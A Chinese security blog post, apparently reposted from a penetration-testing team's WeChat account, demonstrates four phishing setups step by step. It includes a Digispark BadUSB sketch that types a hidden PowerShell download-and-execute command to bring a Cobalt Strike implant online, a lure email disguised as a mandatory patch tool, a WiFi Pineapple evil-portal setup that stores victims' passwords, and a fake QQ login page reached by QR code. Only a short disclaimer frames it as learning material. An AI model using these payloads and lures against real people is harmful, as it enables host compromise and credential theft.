四种钓鱼场景演示

admin 2022年7月11日23:02:43评论80 views字数 3070阅读10分14秒阅读模式

Badusb钓鱼CS上线

使用工具Digispark,形似U盘,使用Arduino编译器往其中烧录程序

安装Arduino调试软件

打开Arduino官网,点击Software。

https://www.arduino.cc

四种钓鱼场景演示
图片

下载Windows版本软件(右边写着Win7 or newer那个)进行安装

四种钓鱼场景演示
图片
四种钓鱼场景演示
图片

安装软件即可,其中会提示你装一个USB驱动,点击安装就行

四种钓鱼场景演示
图片

安装成功则如下图所示

四种钓鱼场景演示
图片

在Arduino开发板中配置Digispark

在“附加开发板管理器网址”中,添加:

https://raw.githubusercontent.com/ArminJo/DigistumpArduino/master/package_digistump_index.json

四种钓鱼场景演示
图片

点击“开发版管理”,并且搜索digistump,便可以找到这个开发版配置信息,安装这个“Digistump AVR Boards”

四种钓鱼场景演示
图片
四种钓鱼场景演示
图片

依次点击“开发板“ -> ”Digistump AVR Boards“ -> ”Digispark(Default - 16.5mhz)“

四种钓鱼场景演示
图片

上传程序

上传要执行的程序即可,输入要上传的代码,并且点击这个向右的箭头即可上传(左边这个是验证,上传包括了验证的步骤)

上传的时候会让你把程序保存在一个地方,随便保存到一个地方

四种钓鱼场景演示
图片
四种钓鱼场景演示
图片

案例一:弹窗记事本

如要弹窗记事本,则烧录如下程序

#include "DigiKeyboard.h"
void setup() {//初始化
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
  delay(500);
  DigiKeyboard.println("notepad");
  delay(500);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop()//循环
{
}
四种钓鱼场景演示
图片

案例二:CS上线

其中xxxx为cs HTTP上线地址

#include <DigiKeyboardFr.h>
void setup() {
  DigiKeyboard.delay(5000);
  DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_CAPSLOCK);
  DigiKeyboard.delay(500);
  DigiKeyboard.println("powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('xxxx'))'");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.sendKeyStroke(KEY_CAPSLOCK);
}
void loop()
{
}

插入Digispark即可上线

邮件钓鱼CS上线

邮件内容

邮件内容(这块需要使用者自己编写一段):

近期出现了xx漏洞,公司联系xx厂商提供了xx漏洞修复工具,请各位员工务必打开进行修复
修复工具下载:
当受害者点击链接的时候,便会下载攻击者服务器上的木马文件,然后双击打开即会在攻击者的CS teamserver上上线

上线木马

安全规则补丁包

(此安全规则布丁包.exe即为上线木马文件,会上线笔者这边的cs,如果使用者需要上线自己服务器的话,需要使用者对自己cs加上https证书,然后给笔者发送自己cs的64位shellcode,我们这边来生成相关exe)

Wifi-Pineapple(菠萝派) Wi-Fi钓鱼信息收集

启动菠萝派,安装4根网线并插入电源

启动菠萝派

连接已经设置好的菠萝派管理WIFI:CMCC-yxaq

WIFI密码为:yx123456

打开浏览器,访问菠萝派管理地址:xx.xx.xx.xx:xxxx

管理密码依然为:yx123456

即可访问Wifi Pineapple的管理地址

四种钓鱼场景演示
图片
四种钓鱼场景演示
图片

配置网络桥接(使菠萝派联网)

此操作的目的是为了达到逻辑上  受害者->菠萝派->互联网的网络结构,使得受害者连接上菠萝派的钓鱼wifi后依然能上网,但是受害者并不知道他和互联网之间夹着个菠萝派

四种钓鱼场景演示
图片

(当点击scan扫描不到wifi时,可以多点击几遍,直到扫描到可用wifi)

四种钓鱼场景演示
图片
四种钓鱼场景演示
图片

使用Evil Portal插件进行钓鱼

四种钓鱼场景演示
图片

然后受害者就会在自己的WIFI里边搜索到,“XXXX内部公用WIFI”,下来就会弹窗出现登陆页面

输入密码即会被钓鱼

四种钓鱼场景演示
图片

如果你想要对钓鱼网页进行修改

当你已经对菠萝派进行网络桥接以后,菠萝派本身就可以连接外部网络了

连接上刚才创建的菠萝派管理地址CMCC-yxaq,使用xshell或者命令行的ssh连接工具,使用ssh登陆菠萝派的命令行终端

用户名root,密码同样是yx123456

登陆成功后显示是这个样子

四种钓鱼场景演示
图片

使用命令进入到portal-yxaq目录

cd portals/yxaq/

便可以看到相关网页文件了,修改就行了

如何查看被钓鱼的密码

登陆到菠萝派后台,进入portal/yxaq文件夹

密码即存储在pwd.txt文件里边

四种钓鱼场景演示
图片

二维码钓鱼信息收集

让受害者直接扫描二维码,即可弹出QQ空间的弹窗(只是演示用,修改其前端页面可以使之更加仿真),受害者填写账号密码,即可在服务端收到其填写的信息,造成信息泄漏

自己搭建一个二维码钓鱼服务器的接受端

访问github有详细搭建教程:

https://github.com/Resek4/QQFishing

在自己的服务器上搭建此服务(需要提前安装docker-compose),然后依次执行以下命令:

git clone https://github.com/Cl0udG0d/QQFishing
cd QQFishing
docker-compose up -d

搭建好后,访问服务器http://IP:5000即可访问其钓鱼地址

四种钓鱼场景演示
图片

生成二维码

百度随便搜索一个可以嵌入图片的二维码生成在线工具,例如

https://cn.online-qrcode-generator.com

将钓鱼URL生成为二维码,受害者扫描二维码即可达到打开钓鱼网页的目的,例如

四种钓鱼场景演示
图片

(此二维码只是个事例,使用者需要自己重新生成)

  • 请严格遵守网络安全法相关条例!此分享主要用于交流学习,若用于其他用途,一切后果自付。


-END-

四种钓鱼场景演示如果本文对您有帮助,来个点赞在看就是对我们莫大的鼓励。四种钓鱼场景演示



  推荐关注:





四种钓鱼场景演示
弱口令安全实验室正式成立于2022年1月,是思而听(山东)网络科技有限公司旗下的网络安全研究团队,专注于网络攻防技术渗透测试硬件安全安全开发网络安全赛事以及网安线上教育领域研究几大板块。
团队社群氛围浓厚,同时背靠思而听(山东)网络科技有限公司旗下的“知行网络安全教育平台”作为社区,容纳同好在安全领域不断进行技术提升以及技术分享,从而形成良好闭环。

团队全员均持CISP-PTE(注册信息安全专业人员-渗透测试工程师)认证,积极参与着各类网络安全赛事并屡获佳绩,同时多次高水准的完成了国家级、省部级攻防演习活动以及相关重报工作,均得到甲方的一致青睐与肯定。

欢迎对网络安全技术感兴趣的你来加入我们实验室,可在公众号内依次点击【关于我们】-【加入我们】来获取联系方式~




原文始发于微信公众号(弱口令安全实验室):四种钓鱼场景演示

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月11日23:02:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   四种钓鱼场景演示https://cn-sec.com/archives/1168723.html

发表评论

匿名网友 填写信息